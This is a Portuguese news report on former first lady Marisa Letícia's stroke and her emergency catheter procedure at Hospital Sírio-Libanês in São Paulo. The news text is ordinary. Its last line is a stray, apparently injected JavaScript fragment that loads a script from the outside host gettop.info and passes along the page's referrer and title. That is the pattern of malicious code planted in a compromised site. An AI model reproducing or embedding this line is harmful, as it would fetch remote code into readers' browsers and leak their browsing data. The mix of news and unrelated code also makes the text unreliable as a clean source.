A ex-primeira-dama Marisa Letícia, mulher do ex-presidente Luiz Inácio Lula da Silva, passou por um procedimento de emergência que durou cerca de duas horas após sofrer um AVC (Acidente Vascular Cerebral). Segundo os médicos, a hemorragia foi contida e ela ficará internada, em observação.
Dona Marisa, de 66 anos, foi transferida na tarde desta terça-feira (24) para o CTI (Centro de Terapia Intensivo) do hospital Sírio-Libanês, em São Paulo. De acordo com o hospital, ela deu entrada às 15h30. Chegou consciente e foi levada diretamente para a realização do cateterismo cerebral, procedimento invasivo utilizado para detectar a existência, localização e gravidade de obstruções em artérias.
A mulher de Lula foi atendida pelo cardiologista Roberto Kalil quando ainda estava no pronto-socorro de São Bernardo (SP) e, em seguida, foi levada de ambulância para o Sírio-Libanês, na capital paulista.
\”Ela chegou consciente, recebeu o primeiro atendimento em São Bernardo, mas o estado de saúde é delicado\”, afirmou o médico, antes da realização do procedimento, que começou antes das 18h e terminou por volta das 20h.
Os médicos introduziram um cateter e conseguiram estancar a hemorragia. O ex-presidente Lula acompanhou todo o procedimento. Ele estava em um evento com metalúrgicos em São Bernardo do Campo e, após saber do AVC, foi para o Sírio-Libanês. \”Não se sabe ainda se haverá sequelas\”, informou, mais cedo, o cardiologista Roberto Kalil.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;